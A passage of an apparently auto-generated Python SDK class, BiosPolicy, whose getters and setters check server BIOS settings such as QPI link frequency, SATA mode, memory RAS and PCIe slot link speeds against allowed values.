def putty_key_pad(self, putty_key_pad):
"""
Sets the putty_key_pad of this BiosPolicy.
BIOS Token for setting Putty KeyPad configuration
:param putty_key_pad: The putty_key_pad of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "ESCN", "LINUX", "SCO", "VT100", "VT400", "XTERMR6"]
if putty_key_pad not in allowed_values:
raise ValueError(
"Invalid value for `putty_key_pad` ({0}), must be one of {1}"
.format(putty_key_pad, allowed_values)
)
self._putty_key_pad = putty_key_pad
@property
def pwr_perf_tuning(self):
"""
Gets the pwr_perf_tuning of this BiosPolicy.
BIOS Token for setting Power Performance Tuning configuration
:return: The pwr_perf_tuning of this BiosPolicy.
:rtype: str
"""
return self._pwr_perf_tuning
@pwr_perf_tuning.setter
def pwr_perf_tuning(self, pwr_perf_tuning):
"""
Sets the pwr_perf_tuning of this BiosPolicy.
BIOS Token for setting Power Performance Tuning configuration
:param pwr_perf_tuning: The pwr_perf_tuning of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "bios", "os"]
if pwr_perf_tuning not in allowed_values:
raise ValueError(
"Invalid value for `pwr_perf_tuning` ({0}), must be one of {1}"
.format(pwr_perf_tuning, allowed_values)
)
self._pwr_perf_tuning = pwr_perf_tuning
@property
def qpi_link_frequency(self):
"""
Gets the qpi_link_frequency of this BiosPolicy.
BIOS Token for setting QPI Link Frequency Select configuration
:return: The qpi_link_frequency of this BiosPolicy.
:rtype: str
"""
return self._qpi_link_frequency
@qpi_link_frequency.setter
def qpi_link_frequency(self, qpi_link_frequency):
"""
Sets the qpi_link_frequency of this BiosPolicy.
BIOS Token for setting QPI Link Frequency Select configuration
:param qpi_link_frequency: The qpi_link_frequency of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "6.4-gt/s", "7.2-gt/s", "8.0-gt/s", "9.6-gt/s", "auto"]
if qpi_link_frequency not in allowed_values:
raise ValueError(
"Invalid value for `qpi_link_frequency` ({0}), must be one of {1}"
.format(qpi_link_frequency, allowed_values)
)
self._qpi_link_frequency = qpi_link_frequency
@property
def qpi_snoop_mode(self):
"""
Gets the qpi_snoop_mode of this BiosPolicy.
BIOS Token for setting QPI Snoop Mode configuration
:return: The qpi_snoop_mode of this BiosPolicy.
:rtype: str
"""
return self._qpi_snoop_mode
@qpi_snoop_mode.setter
def qpi_snoop_mode(self, qpi_snoop_mode):
"""
Sets the qpi_snoop_mode of this BiosPolicy.
BIOS Token for setting QPI Snoop Mode configuration
:param qpi_snoop_mode: The qpi_snoop_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "cluster-on-die", "early-snoop", "home-directory-snoop", "home-directory-snoop-with-osb", "home-snoop"]
if qpi_snoop_mode not in allowed_values:
raise ValueError(
"Invalid value for `qpi_snoop_mode` ({0}), must be one of {1}"
.format(qpi_snoop_mode, allowed_values)
)
self._qpi_snoop_mode = qpi_snoop_mode
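# Sketch (illustrative): the two QPI tokens are usually tuned together,
# link frequency for bandwidth and snoop mode for coherency behavior:
#
#     policy.qpi_link_frequency = "9.6-gt/s"
#     policy.qpi_snoop_mode = "cluster-on-die"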
@property
def rank_inter_leave(self):
"""
Gets the rank_inter_leave of this BiosPolicy.
BIOS Token for setting Rank Interleaving configuration
:return: The rank_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._rank_inter_leave
@rank_inter_leave.setter
def rank_inter_leave(self, rank_inter_leave):
"""
Sets the rank_inter_leave of this BiosPolicy.
BIOS Token for setting Rank Interleaving configuration
:param rank_inter_leave: The rank_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way", "2-way", "4-way", "8-way", "auto"]
if rank_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `rank_inter_leave` ({0}), must be one of {1}"
.format(rank_inter_leave, allowed_values)
)
self._rank_inter_leave = rank_inter_leave
@property
def redirection_after_post(self):
"""
Gets the redirection_after_post of this BiosPolicy.
BIOS Token for setting Redirection After BIOS POST configuration
:return: The redirection_after_post of this BiosPolicy.
:rtype: str
"""
return self._redirection_after_post
@redirection_after_post.setter
def redirection_after_post(self, redirection_after_post):
"""
Sets the redirection_after_post of this BiosPolicy.
BIOS Token for setting Redirection After BIOS POST configuration
:param redirection_after_post: The redirection_after_post of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Always Enable", "Bootloader"]
if redirection_after_post not in allowed_values:
raise ValueError(
"Invalid value for `redirection_after_post` ({0}), must be one of {1}"
.format(redirection_after_post, allowed_values)
)
self._redirection_after_post = redirection_after_post
@property
def sata_mode_select(self):
"""
Gets the sata_mode_select of this BiosPolicy.
BIOS Token for setting SATA mode configuration
:return: The sata_mode_select of this BiosPolicy.
:rtype: str
"""
return self._sata_mode_select
@sata_mode_select.setter
def sata_mode_select(self, sata_mode_select):
"""
Sets the sata_mode_select of this BiosPolicy.
BIOS Token for setting SATA mode configuration
:param sata_mode_select: The sata_mode_select of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "AHCI", "Disabled", "LSI SW RAID"]
if sata_mode_select not in allowed_values:
raise ValueError(
"Invalid value for `sata_mode_select` ({0}), must be one of {1}"
.format(sata_mode_select, allowed_values)
)
self._sata_mode_select = sata_mode_select
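# Note (illustrative): `psata` and `sata_mode_select` configure separate
# embedded controllers but accept the same mode strings, so a policy
# will often set both:
#
#     policy.psata = "AHCI"
#     policy.sata_mode_select = "AHCI"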
@property
def select_memory_ras_configuration(self):
"""
Gets the select_memory_ras_configuration of this BiosPolicy.
BIOS Token for setting Select Memory RAS configuration
:return: The select_memory_ras_configuration of this BiosPolicy.
:rtype: str
"""
return self._select_memory_ras_configuration
@select_memory_ras_configuration.setter
def select_memory_ras_configuration(self, select_memory_ras_configuration):
"""
Sets the select_memory_ras_configuration of this BiosPolicy.
BIOS Token for setting Select Memory RAS configuration
:param select_memory_ras_configuration: The select_memory_ras_configuration of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "lockstep", "maximum-performance", "mirror-mode-1lm", "mirroring", "sparing"]
if select_memory_ras_configuration not in allowed_values:
raise ValueError(
"Invalid value for `select_memory_ras_configuration` ({0}), must be one of {1}"
.format(select_memory_ras_configuration, allowed_values)
)
self._select_memory_ras_configuration = select_memory_ras_configuration
@property
def serial_port_aenable(self):
"""
Gets the serial_port_aenable of this BiosPolicy.
BIOS Token for setting Serial A Enable configuration
:return: The serial_port_aenable of this BiosPolicy.
:rtype: str
"""
return self._serial_port_aenable
@serial_port_aenable.setter
def serial_port_aenable(self, serial_port_aenable):
"""
Sets the serial_port_aenable of this BiosPolicy.
BIOS Token for setting Serial A Enable configuration
:param serial_port_aenable: The serial_port_aenable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if serial_port_aenable not in allowed_values:
raise ValueError(
"Invalid value for `serial_port_aenable` ({0}), must be one of {1}"
.format(serial_port_aenable, allowed_values)
)
self._serial_port_aenable = serial_port_aenable
@property
def single_pctl_enable(self):
"""
Gets the single_pctl_enable of this BiosPolicy.
BIOS Token for setting Single PCTL configuration
:return: The single_pctl_enable of this BiosPolicy.
:rtype: str
"""
return self._single_pctl_enable
@single_pctl_enable.setter
def single_pctl_enable(self, single_pctl_enable):
"""
Sets the single_pctl_enable of this BiosPolicy.
BIOS Token for setting Single PCTL configuration
:param single_pctl_enable: The single_pctl_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "No", "Yes"]
if single_pctl_enable not in allowed_values:
raise ValueError(
"Invalid value for `single_pctl_enable` ({0}), must be one of {1}"
.format(single_pctl_enable, allowed_values)
)
self._single_pctl_enable = single_pctl_enable
@property
def slot10link_speed(self):
"""
Gets the slot10link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:10 Link Speed configuration
:return: The slot10link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot10link_speed
@slot10link_speed.setter
def slot10link_speed(self, slot10link_speed):
"""
Sets the slot10link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:10 Link Speed configuration
:param slot10link_speed: The slot10link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot10link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot10link_speed` ({0}), must be one of {1}"
.format(slot10link_speed, allowed_values)
)
self._slot10link_speed = slot10link_speed
@property
def slot10state(self):
"""
Gets the slot10state of this BiosPolicy.
BIOS Token for setting Slot 10 state configuration
:return: The slot10state of this BiosPolicy.
:rtype: str
"""
return self._slot10state
@slot10state.setter
def slot10state(self, slot10state):
"""
Sets the slot10state of this BiosPolicy.
BIOS Token for setting Slot 10 state configuration
:param slot10state: The slot10state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot10state not in allowed_values:
raise ValueError(
"Invalid value for `slot10state` ({0}), must be one of {1}"
.format(slot10state, allowed_values)
)
self._slot10state = slot10state
@property
def slot11link_speed(self):
"""
Gets the slot11link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:11 Link Speed configuration
:return: The slot11link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot11link_speed
@slot11link_speed.setter
def slot11link_speed(self, slot11link_speed):
"""
Sets the slot11link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:11 Link Speed configuration
:param slot11link_speed: The slot11link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot11link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot11link_speed` ({0}), must be one of {1}"
.format(slot11link_speed, allowed_values)
)
self._slot11link_speed = slot11link_speed
@property
def slot11state(self):
"""
Gets the slot11state of this BiosPolicy.
BIOS Token for setting Slot 11 state configuration
:return: The slot11state of this BiosPolicy.
:rtype: str
"""
return self._slot11state
@slot11state.setter
def slot11state(self, slot11state):
"""
Sets the slot11state of this BiosPolicy.
BIOS Token for setting Slot 11 state configuration
:param slot11state: The slot11state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot11state not in allowed_values:
raise ValueError(
"Invalid value for `slot11state` ({0}), must be one of {1}"
.format(slot11state, allowed_values)
)
self._slot11state = slot11state
@property
def slot12link_speed(self):
"""
Gets the slot12link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:12 Link Speed configuration
:return: The slot12link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot12link_speed
@slot12link_speed.setter
def slot12link_speed(self, slot12link_speed):
"""
Sets the slot12link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:12 Link Speed configuration
:param slot12link_speed: The slot12link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot12link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot12link_speed` ({0}), must be one of {1}"
.format(slot12link_speed, allowed_values)
)
self._slot12link_speed = slot12link_speed
@property
def slot12state(self):
"""
Gets the slot12state of this BiosPolicy.
BIOS Token for setting Slot 12 state configuration
:return: The slot12state of this BiosPolicy.
:rtype: str
"""
return self._slot12state
@slot12state.setter
def slot12state(self, slot12state):
"""
Sets the slot12state of this BiosPolicy.
BIOS Token for setting Slot 12 state configuration
:param slot12state: The slot12state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot12state not in allowed_values:
raise ValueError(
"Invalid value for `slot12state` ({0}), must be one of {1}"
.format(slot12state, allowed_values)
)
self._slot12state = slot12state
@property
def slot1link_speed(self):
"""
Gets the slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:1 Link Speed configuration
:return: The slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot1link_speed
@slot1link_speed.setter
def slot1link_speed(self, slot1link_speed):
"""
Sets the slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:1 Link Speed configuration
:param slot1link_speed: The slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot1link_speed` ({0}), must be one of {1}"
.format(slot1link_speed, allowed_values)
)
self._slot1link_speed = slot1link_speed
@property
def slot1state(self):
"""
Gets the slot1state of this BiosPolicy.
BIOS Token for setting Slot 1 state configuration
:return: The slot1state of this BiosPolicy.
:rtype: str
"""
return self._slot1state
@slot1state.setter
def slot1state(self, slot1state):
"""
Sets the slot1state of this BiosPolicy.
BIOS Token for setting Slot 1 state configuration
:param slot1state: The slot1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot1state not in allowed_values:
raise ValueError(
"Invalid value for `slot1state` ({0}), must be one of {1}"
.format(slot1state, allowed_values)
)
self._slot1state = slot1state
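# Sketch (illustrative): each PCIe slot pairs a link-speed token with an
# OptionROM/state token, set independently. For example, to force Gen2
# with a legacy OptionROM on slot 1:
#
#     policy.slot1link_speed = "GEN2"
#     policy.slot1state = "Legacy Only"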
@property
def slot2link_speed(self):
"""
Gets the slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:2 Link Speed configuration
:return: The slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot2link_speed
@slot2link_speed.setter
def slot2link_speed(self, slot2link_speed):
"""
Sets the slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:2 Link Speed configuration
:param slot2link_speed: The slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot2link_speed` ({0}), must be one of {1}"
.format(slot2link_speed, allowed_values)
)
self._slot2link_speed = slot2link_speed
@property
def slot2state(self):
"""
Gets the slot2state of this BiosPolicy.
BIOS Token for setting Slot 2 state configuration
:return: The slot2state of this BiosPolicy.
:rtype: str
"""
return self._slot2state
@slot2state.setter
def slot2state(self, slot2state):
"""
Sets the slot2state of this BiosPolicy.
BIOS Token for setting Slot 2 state configuration
:param slot2state: The slot2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot2state not in allowed_values:
raise ValueError(
"Invalid value for `slot2state` ({0}), must be one of {1}"
.format(slot2state, allowed_values)
)
self._slot2state = slot2state
@property
def slot3link_speed(self):
"""
Gets the slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:3 Link Speed configuration
:return: The slot3link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot3link_speed
@slot3link_speed.setter
def slot3link_speed(self, slot3link_speed):
"""
Sets the slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:3 Link Speed configuration
:param slot3link_speed: The slot3link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot3link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot3link_speed` ({0}), must be one of {1}"
.format(slot3link_speed, allowed_values)
)
self._slot3link_speed = slot3link_speed
@property
def slot3state(self):
"""
Gets the slot3state of this BiosPolicy.
BIOS Token for setting Slot 3 state configuration
:return: The slot3state of this BiosPolicy.
:rtype: str
"""
return self._slot3state
@slot3state.setter
def slot3state(self, slot3state):
"""
Sets the slot3state of this BiosPolicy.
BIOS Token for setting Slot 3 state configuration
:param slot3state: The slot3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot3state not in allowed_values:
raise ValueError(
"Invalid value for `slot3state` ({0}), must be one of {1}"
.format(slot3state, allowed_values)
)
self._slot3state = slot3state
@property
def slot4link_speed(self):
"""
Gets the slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:4 Link Speed configuration
:return: The slot4link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot4link_speed
@slot4link_speed.setter
def slot4link_speed(self, slot4link_speed):
"""
Sets the slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:4 Link Speed configuration
:param slot4link_speed: The slot4link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot4link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot4link_speed` ({0}), must be one of {1}"
.format(slot4link_speed, allowed_values)
)
self._slot4link_speed = slot4link_speed
@property
def slot4state(self):
"""
Gets the slot4state of this BiosPolicy.
BIOS Token for setting Slot 4 state configuration
:return: The slot4state of this BiosPolicy.
:rtype: str
"""
return self._slot4state
@slot4state.setter
def slot4state(self, slot4state):
"""
Sets the slot4state of this BiosPolicy.
BIOS Token for setting Slot 4 state configuration
:param slot4state: The slot4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot4state not in allowed_values:
raise ValueError(
"Invalid value for `slot4state` ({0}), must be one of {1}"
.format(slot4state, allowed_values)
)
self._slot4state = slot4state
@property
def slot5link_speed(self):
"""
Gets the slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:5 Link Speed configuration
:return: The slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot5link_speed
@slot5link_speed.setter
def slot5link_speed(self, slot5link_speed):
"""
Sets the slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:5 Link Speed configuration
:param slot5link_speed: The slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot5link_speed` ({0}), must be one of {1}"
.format(slot5link_speed, allowed_values)
)
self._slot5link_speed = slot5link_speed
@property
def slot5state(self):
"""
Gets the slot5state of this BiosPolicy.
BIOS Token for setting Slot 5 state configuration
:return: The slot5state of this BiosPolicy.
:rtype: str
"""
return self._slot5state
@slot5state.setter
def slot5state(self, slot5state):
"""
Sets the slot5state of this BiosPolicy.
BIOS Token for setting Slot 5 state configuration
:param slot5state: The slot5state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot5state not in allowed_values:
raise ValueError(
"Invalid value for `slot5state` ({0}), must be one of {1}"
.format(slot5state, allowed_values)
)
self._slot5state = slot5state
@property
def slot6link_speed(self):
"""
Gets the slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:6 Link Speed configuration
:return: The slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot6link_speed
@slot6link_speed.setter
def slot6link_speed(self, slot6link_speed):
"""
Sets the slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:6 Link Speed configuration
:param slot6link_speed: The slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot6link_speed` ({0}), must be one of {1}"
.format(slot6link_speed, allowed_values)
)
self._slot6link_speed = slot6link_speed
@property
def slot6state(self):
"""
Gets the slot6state of this BiosPolicy.
BIOS Token for setting Slot 6 state configuration
:return: The slot6state of this BiosPolicy.
:rtype: str
"""
return self._slot6state
@slot6state.setter
def slot6state(self, slot6state):
"""
Sets the slot6state of this BiosPolicy.
BIOS Token for setting Slot 6 state configuration
:param slot6state: The slot6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot6state not in allowed_values:
raise ValueError(
"Invalid value for `slot6state` ({0}), must be one of {1}"
.format(slot6state, allowed_values)
)
self._slot6state = slot6state
@property
def slot7link_speed(self):
"""
Gets the slot7link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:7 Link Speed configuration
:return: The slot7link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot7link_speed
@slot7link_speed.setter
def slot7link_speed(self, slot7link_speed):
"""
Sets the slot7link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:7 Link Speed configuration
:param slot7link_speed: The slot7link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot7link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot7link_speed` ({0}), must be one of {1}"
.format(slot7link_speed, allowed_values)
)
self._slot7link_speed = slot7link_speed
@property
def slot7state(self):
"""
Gets the slot7state of this BiosPolicy.
BIOS Token for setting Slot 7 state configuration
:return: The slot7state of this BiosPolicy.
:rtype: str
"""
return self._slot7state
@slot7state.setter
def slot7state(self, slot7state):
"""
Sets the slot7state of this BiosPolicy.
BIOS Token for setting Slot 7 state configuration
:param slot7state: The slot7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot7state not in allowed_values:
raise ValueError(
"Invalid value for `slot7state` ({0}), must be one of {1}"
.format(slot7state, allowed_values)
)
self._slot7state = slot7state
@property
def slot8link_speed(self):
"""
Gets the slot8link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:8 Link Speed configuration
:return: The slot8link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot8link_speed
@slot8link_speed.setter
def slot8link_speed(self, slot8link_speed):
"""
Sets the slot8link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:8 Link Speed configuration
:param slot8link_speed: The slot8link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot8link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot8link_speed` ({0}), must be one of {1}"
.format(slot8link_speed, allowed_values)
)
self._slot8link_speed = slot8link_speed
@property
def slot8state(self):
"""
Gets the slot8state of this BiosPolicy.
BIOS Token for setting Slot 8 state configuration
:return: The slot8state of this BiosPolicy.
:rtype: str
"""
return self._slot8state
@slot8state.setter
def slot8state(self, slot8state):
"""
Sets the slot8state of this BiosPolicy.
BIOS Token for setting Slot 8 state configuration
:param slot8state: The slot8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot8state not in allowed_values:
raise ValueError(
"Invalid value for `slot8state` ({0}), must be one of {1}"
.format(slot8state, allowed_values)
)
self._slot8state = slot8state
@property
def slot9link_speed(self):
"""
Gets the slot9link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:9 Link Speed configuration
:return: The slot9link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot9link_speed
@slot9link_speed.setter
def slot9link_speed(self, slot9link_speed):
"""
Sets the slot9link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:9 Link Speed configuration
:param slot9link_speed: The slot9link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot9link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot9link_speed` ({0}), must be one of {1}"
.format(slot9link_speed, allowed_values)
)
self._slot9link_speed = slot9link_speed
@property
def slot9state(self):
"""
Gets the slot9state of this BiosPolicy.
BIOS Token for setting Slot 9 state configuration
:return: The slot9state of this BiosPolicy.
:rtype: str
"""
return self._slot9state
@slot9state.setter
def slot9state(self, slot9state):
"""
Sets the slot9state of this BiosPolicy.
BIOS Token for setting Slot 9 state configuration
:param slot9state: The slot9state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot9state not in allowed_values:
raise ValueError(
"Invalid value for `slot9state` ({0}), must be one of {1}"
.format(slot9state, allowed_values)
)
self._slot9state = slot9state
@property
def slot_flom_link_speed(self):
"""
Gets the slot_flom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FLOM Link Speed configuration
:return: The slot_flom_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_flom_link_speed
@slot_flom_link_speed.setter
def slot_flom_link_speed(self, slot_flom_link_speed):
"""
Sets the slot_flom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FLOM Link Speed configuration
:param slot_flom_link_speed: The slot_flom_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_flom_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_flom_link_speed` ({0}), must be one of {1}"
.format(slot_flom_link_speed, allowed_values)
)
self._slot_flom_link_speed = slot_flom_link_speed
@property
def slot_front_nvme1link_speed(self):
"""
Gets the slot_front_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme1 Link Speed configuration
:return: The slot_front_nvme1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_nvme1link_speed
@slot_front_nvme1link_speed.setter
def slot_front_nvme1link_speed(self, slot_front_nvme1link_speed):
"""
Sets the slot_front_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme1 Link Speed configuration
:param slot_front_nvme1link_speed: The slot_front_nvme1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_nvme1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_nvme1link_speed` ({0}), must be one of {1}"
.format(slot_front_nvme1link_speed, allowed_values)
)
self._slot_front_nvme1link_speed = slot_front_nvme1link_speed
@property
def slot_front_nvme2link_speed(self):
"""
Gets the slot_front_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme2 Link Speed configuration
:return: The slot_front_nvme2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_nvme2link_speed
@slot_front_nvme2link_speed.setter
def slot_front_nvme2link_speed(self, slot_front_nvme2link_speed):
"""
Sets the slot_front_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme2 Link Speed configuration
:param slot_front_nvme2link_speed: The slot_front_nvme2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_nvme2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_nvme2link_speed` ({0}), must be one of {1}"
.format(slot_front_nvme2link_speed, allowed_values)
)
self._slot_front_nvme2link_speed = slot_front_nvme2link_speed
@property
def slot_front_slot5link_speed(self):
"""
Gets the slot_front_slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front1 Link Speed configuration
:return: The slot_front_slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_slot5link_speed
@slot_front_slot5link_speed.setter
def slot_front_slot5link_speed(self, slot_front_slot5link_speed):
"""
Sets the slot_front_slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front1 Link Speed configuration
:param slot_front_slot5link_speed: The slot_front_slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_slot5link_speed` ({0}), must be one of {1}"
.format(slot_front_slot5link_speed, allowed_values)
)
self._slot_front_slot5link_speed = slot_front_slot5link_speed
@property
def slot_front_slot6link_speed(self):
"""
Gets the slot_front_slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front2 Link Speed configuration
:return: The slot_front_slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_slot6link_speed
@slot_front_slot6link_speed.setter
def slot_front_slot6link_speed(self, slot_front_slot6link_speed):
"""
Sets the slot_front_slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front2 Link Speed configuration
:param slot_front_slot6link_speed: The slot_front_slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_slot6link_speed` ({0}), must be one of {1}"
.format(slot_front_slot6link_speed, allowed_values)
)
self._slot_front_slot6link_speed = slot_front_slot6link_speed
@property
def slot_hba_link_speed(self):
"""
Gets the slot_hba_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA Link Speed configuration
:return: The slot_hba_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_hba_link_speed
@slot_hba_link_speed.setter
def slot_hba_link_speed(self, slot_hba_link_speed):
"""
Sets the slot_hba_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA Link Speed configuration
:param slot_hba_link_speed: The slot_hba_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_hba_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_hba_link_speed` ({0}), must be one of {1}"
.format(slot_hba_link_speed, allowed_values)
)
self._slot_hba_link_speed = slot_hba_link_speed
@property
def slot_hba_state(self):
"""
Gets the slot_hba_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA OptionROM configuration
:return: The slot_hba_state of this BiosPolicy.
:rtype: str
"""
return self._slot_hba_state
@slot_hba_state.setter
def slot_hba_state(self, slot_hba_state):
"""
Sets the slot_hba_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA OptionROM configuration
:param slot_hba_state: The slot_hba_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
